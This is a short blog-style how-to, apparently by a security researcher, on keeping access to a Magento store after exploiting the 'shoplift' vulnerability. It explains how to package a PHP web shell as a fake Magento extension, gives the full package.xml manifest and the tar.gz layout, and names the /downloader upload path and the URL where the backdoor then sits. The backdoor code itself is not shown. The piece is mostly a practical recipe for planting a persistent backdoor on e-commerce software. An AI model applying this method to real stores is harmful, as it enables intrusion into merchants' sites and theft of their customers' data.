I was exploiting the shoplift vulnerability on a Magento instance, and I was looking for a practical (as in easy and clean) way to get a shell. Of course, I could have chained CVE-2015-1398 and CVE-2015-1399 like Checkpoint did, but I was way too lazy.
Instead, I decided to write an extension module and to install it. Since the internet is full of either outdated or way, way, way, way too complex tutorials about how to write a simple fucking extension with a single stupid php file, here is a quick how-to:
I didn't want to read the url-rewriting code of magento, so I decided
that my backdoor will be under the errors folder.
Write (or get) a php backdoor, and put it into an errors folder,
create a package.xml file like this one, and put everything into a tar.gz file, like this:
$ tree
.
├── errors
│ └── backdoor.php
└── package.xml
That's it, you have your module, you can now upload it on http://yourmagentoinstan.ce/downloader,
and access your backdoor on http://yourmagentoinstan.ce/errors/backdoor.php.
<?xml version="1.0"?>
<package>
<name>backdoor</name>
<version>1.3.3.7</version>
<stability>devel</stability>
<licence>backdoor</licence>
<channel>community</channel>
<extends/>
<summary>Backdoor for magento</summary>
<description>Backdoor for magento</description>
<notes>backdoor</notes>
<authors>
<author>
<name>jvoisin</name>
<user>jvoisin</user>
<email>julien.voisin@dustri.org</email>
</author>
</authors>
<date>2015-08-17</date>
<time>13:47:49</time>
<contents>
<target name="mage">
<dir>
<dir name="errors">
<file name="backdoor.php" hash="1296555a85143621a52b2573a5cae715"/>
</dir>
</dir>
</target>
</contents>
<compatible/>
<dependencies>
<required>
<php>
<min>5.2.0</min>
<max>6.0.0</max>
</php>
</required>
</dependencies>
</package>
The hash tag is the md5sum of your file (here, backdoor.php).